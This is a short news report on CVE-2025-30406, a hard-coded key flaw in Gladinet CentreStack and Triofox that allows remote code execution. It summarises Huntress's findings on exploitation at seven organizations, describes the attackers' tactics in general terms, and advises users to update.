A critical security flaw recently uncovered in Gladinet CentreStack also affects its counterpart, Triofox, a remote access and collaboration platform. According to cybersecurity firm Huntress. So far, attackers have compromised systems at seven different organizations.
Tracked as CVE-2025-30406 with a CVSS score of 9.0, the vulnerability stems from a hard-coded cryptographic key. This weakness enables attackers to execute remote code on exposed servers.
CentreStack addressed the flaw in version 16.4.10315.56368, released on April 3, 2025. However, Huntress now confirms that the same issue exists in Triofox versions up to 16.4.10317.56372.
“Earlier versions of Triofox use the same hardcoded cryptographic keys,” said John Hammond, principal cybersecurity researcher at Huntress. “This configuration allows easy abuse for remote code execution.”
Huntress telemetry shows CentreStack is deployed on about 120 endpoints. And the vulnerability has already been exploited across seven separate organizations.
The first known compromise occurred on April 11, 2025, at 16:59:44 UTC. In these incidents, attackers used the flaw to run encoded PowerShell scripts, download and sideload malicious DLLs, move laterally within the network, and install MeshCentral for remote control.
Researchers also observed attackers executing Impacket PowerShell commands to gather system details and deploy MeshAgent. While the campaign’s full extent and objectives remain unclear, the tactics are similar to those used in recent attacks targeting CrushFTP vulnerabilities.
Due to active exploitation, users of both CentreStack and Triofox are urged to update to the latest versions immediately to mitigate the risk of compromise.
